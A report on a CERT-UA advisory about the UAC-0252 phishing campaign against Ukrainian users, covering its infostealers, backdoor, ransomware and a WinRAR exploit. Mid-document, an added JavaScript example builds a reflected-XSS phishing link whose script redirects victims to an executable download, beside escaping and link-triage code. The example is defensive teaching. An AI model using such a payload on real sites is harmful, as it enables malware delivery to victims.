In early 2026, attackers began mass-mailing messages that impersonate official communications from Ukrainian state authorities. Recipients are urged to "update mobile applications" used for common civilian and military services. Behind the messages is a campaign that deploys a set of tools built to steal data and obtain remote control of compromised computers.
The activity was disclosed by the State Service of Special Communications and Information Protection of Ukraine through its government computer emergency response team, CERT-UA. The group has been assigned the identifier UAC-0252. Since January 2026, CERT-UA has observed a large volume of messages purporting to come from central executive bodies and regional administrations.
The messages carry either an archive containing an executable or a link to a compromised web resource. In the latter case the link points to a legitimate website affected by a cross-site scripting (XSS) vulnerability: opening the page runs attacker-supplied JavaScript, which downloads the executable onto the victim's computer. Because the hostname in such a link is genuine, domain-reputation filtering alone will not catch it; with reflected XSS the malicious script travels in the link's own query string, so URL parameters, not just domains, need inspection. Some of the malicious files and scripts are hosted on GitHub, disguised as ordinary, innocuous projects.
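The delivery step described above, shown as an added example that is not code from CERT-UA, from the page, or from any site the advisory names: a legitimate site reflects a query parameter into its page without escaping, so a phishing link can carry a script that redirects the browser to an attacker-hosted executable. The domain `legit-site.example`, the parameter `q`, the GitHub download URL and the helper names are all hypothetical; the hardened variant beside the vulnerable one shows the fix, and the last helper is the kind of URL-triage check an email gateway could apply to inbound links.

```javascript
// Added example (not from the page or CERT-UA). Demonstrates reflected XSS used as a
// malware-delivery step, the escaped fix, and a simple link-triage check.
// All names, URLs and parameters below are hypothetical.

// Minimal HTML escaping suitable for text nodes and quoted attribute values.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable server-side template: reflects the "q" parameter into the page verbatim.
function renderVulnerable(pageUrl) {
  const q = new URL(pageUrl).searchParams.get("q") ?? "";
  return `<h1>Search results for: ${q}</h1>`;
}

// Hardened template: same page, but the parameter is escaped before insertion,
// so a <script> in the query string is shown as text rather than executed.
function renderHardened(pageUrl) {
  const q = new URL(pageUrl).searchParams.get("q") ?? "";
  return `<h1>Search results for: ${escapeHtml(q)}</h1>`;
}

// Hypothetical phishing link of the kind described: a genuine hostname, a reflected
// parameter, and a payload that sends the browser to an executable hosted on GitHub.
const PAYLOAD =
  '<script>location.href="https://raw.githubusercontent.com/example-org/update/main/update.exe"</script>';
const PHISHING_LINK =
  "https://legit-site.example/search?q=" + encodeURIComponent(PAYLOAD);

// Triage check for a rendered page: does it contain a live <script> element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Triage check for an inbound link: which query parameters, once URL-decoded,
// contain HTML markup? A non-empty result is worth a closer look even when the
// hostname is reputable.
function queryParamsWithMarkup(link) {
  const u = new URL(link);
  return [...u.searchParams.entries()]
    .filter(([, value]) => /<[a-z!/]/i.test(value))
    .map(([name]) => name);
}

console.log("vulnerable:", renderVulnerable(PHISHING_LINK));
console.log("hardened:  ", renderHardened(PHISHING_LINK));
console.log("suspicious params:", queryParamsWithMarkup(PHISHING_LINK));
```

Run with `node`. The vulnerable render contains the `<script>` element intact, the hardened render contains only `&lt;script&gt;...`, and `queryParamsWithMarkup` flags `q` because the decoded value starts with a tag, which is the signal to inspect rather than trust the link on its hostname alone.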
The campaign uses several malware families. The SHADOWSNIFF and SALATSTEALER infostealers harvest credentials and other sensitive data. Investigators also found DEAFTICK, a simple backdoor written in Go. Together these tools give the attackers access to the compromised system and let them collect the user's sensitive data.
While examining the attackers' infrastructure, analysts found another suspicious tool in a GitHub repository: file-encrypting ransomware with the internal name "AVANGARD ULTIMATE v6.0". The same repository held an archive containing an exploit for a WinRAR vulnerability (CVE-2025-8088), which shows that the group is pursuing more than one route into target systems. CVE-2025-8088 was fixed in WinRAR 7.13; since WinRAR does not update itself, defenders should verify installed versions rather than assume the patch is in place.
Analysis of the tools and infrastructure links the campaign to the operators who distribute material through the PalachPro Telegram channel. CERT-UA continues to track the activity of the group designated UAC-0252.